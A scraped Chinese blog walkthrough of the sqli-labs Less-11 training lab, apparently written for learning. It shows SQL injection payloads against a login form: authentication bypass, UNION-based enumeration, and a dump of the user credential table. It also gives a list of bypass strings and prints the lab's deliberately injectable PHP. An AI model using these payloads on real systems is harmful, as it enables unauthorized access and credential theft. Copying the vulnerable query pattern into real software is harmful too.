程序博客网 > 电熨斗推荐 知乎

Less-11&12

来源:互联网 发布:电熨斗推荐 知乎 编辑:程序博客网 时间:2024/05/22 12:28
select usename,password from table where usename = inputname and password = iputpassword
http://localhost/sqli-labs-master/Less-11/uname=123'&passwd=456&submit=Submit

near '    456' LIMIT 0,1   ' at line 1

passwd 清空

http://localhost/sqli-labs-master/Less-11/uname=123'&passwd=&submit=Submit

 near '    '   123'    ' and password='  ' LIMIT 0,1    ' at line 1
=》select usename,password from table where usename = 'inputname' and password = 'iputpassword'

uname=123' or 1=1#&passwd=&submit=Submit
=》Your Login name:Dumb
   Your Password:Dumb
uname=123' or 1=1 limit 1,1#&passwd=&submit=Submit
=》 Your Login name:Angelina
    Your Password:I-kill-you
uname=123' or 1=1 order by 4#&passwd=&submit=Submit
=》Unknown column '4' in 'order clause'
....uname=123' or 1=1 order by 2#&passwd=&submit=Submit
=>
Your Login name:admin
Your Password:admin

uname=123' union select version(),database()#&passwd=&submit=Submit
=>
Your Login name:5.5.47
Your Password:security
uname=123' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=&submit=Submit
=>

Your Login name:1
Your Password:emails,referers,uagents,users
uname=123' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=&submit=Submit
=>

Your Login name:1
Your Password:id,username,password

uname=123' union select group_concat(username),group_concat(password) from users#&passwd=&submit=Submit

Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4


常用万能密码
or 1=1--
'or 1=1--
"or 1=1--
'or'='or'

<?php//including the Mysql connect parameters.include("../sql-connections/sql-connect.php");error_reporting(0);// take the variablesif(isset($_POST['uname']) && isset($_POST['passwd'])){$uname=$_POST['uname'];$passwd=$_POST['passwd'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'User Name:'.$uname);fwrite($fp,'Password:'.$passwd."\n");fclose($fp);// connectivity @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){  //echo '<font color= "#0000ff">';    echo "<br>";echo '<font color= "#FFFF00" font size = 4>';//echo " You Have successfully logged in\n\n " ;echo '<font size="3" color="#0000ff">';echo "<br>";echo 'Your Login name:'. $row['username'];echo "<br>";echo 'Your Password:' .$row['password'];echo "<br>";echo "</font>";echo "<br>";echo "<br>";echo '<img src="../images/flag.jpg"  />';  echo "</font>";  }else  {echo '<font color= "#0000ff" font size="3">';//echo "Try again looser";print_r(mysql_error());echo "</br>";echo "</br>";echo "</br>";echo '<img src="../images/slap.jpg" />';echo "</font>";  }}?>

0 0
电熨斗推荐 知乎 电熨斗推荐 知乎
原创粉丝点击
热门IT博客
账户数据库设计账户数据库设计
崩坏3矩阵怎么回血崩坏3矩阵怎么回血
魔蝎数据科技
怎样在官网下载java
淘宝创建子帐号
pp盘古越狱 mac版
便携水杯推荐知乎
原语在c语言
初学者吉他知乎
java 1 true false
易语言彩票表格源码
java接口协议有哪些
最优化pdf网盘
双色球参选数据2017年
windows笔记本
名师视频讲课软件
mac能不能下spss
断开连接的网络驱动器
地摊毛巾知乎
js数组移除指定元素
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 严重失眠该怎么办 一直失眠是什么原因 失眠是因为什么原因造成的 人长期失眠怎么办 失眠有什么办法解决 晚上失眠有什么方法吗 晚上失眠的原因 失眠用什么药 失眠原因是什么 失眠症是什么 为什么总失眠 长期失眠该怎么办 失眠是什么造成的 失眠怎么能好 失眠是咋么回事 总失眠该怎么办 长期失眠的原因 长期失眠应该怎么办 失眠的原因有那些 失眠是什么原因导致 失眠是怎么回事啊 失眠了该怎么办 导致失眠的原因是什么 引发失眠的原因 晚上经常失眠原因 突然失眠了怎么回事 失眠什么情况 导致失眠的主要原因 失眠怎么是什么原因 晚上睡觉失眠怎么回事 失眠症有哪些表现 失眠有几种原因 失眠有何办法 失眠晚上睡不着怎么办 突然失眠是什么原因 失眠的主要原因 失眠有什么药 失眼 晚上老是睡不着怎么办 天天晚上睡不着怎么办 入眠困难怎么办

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里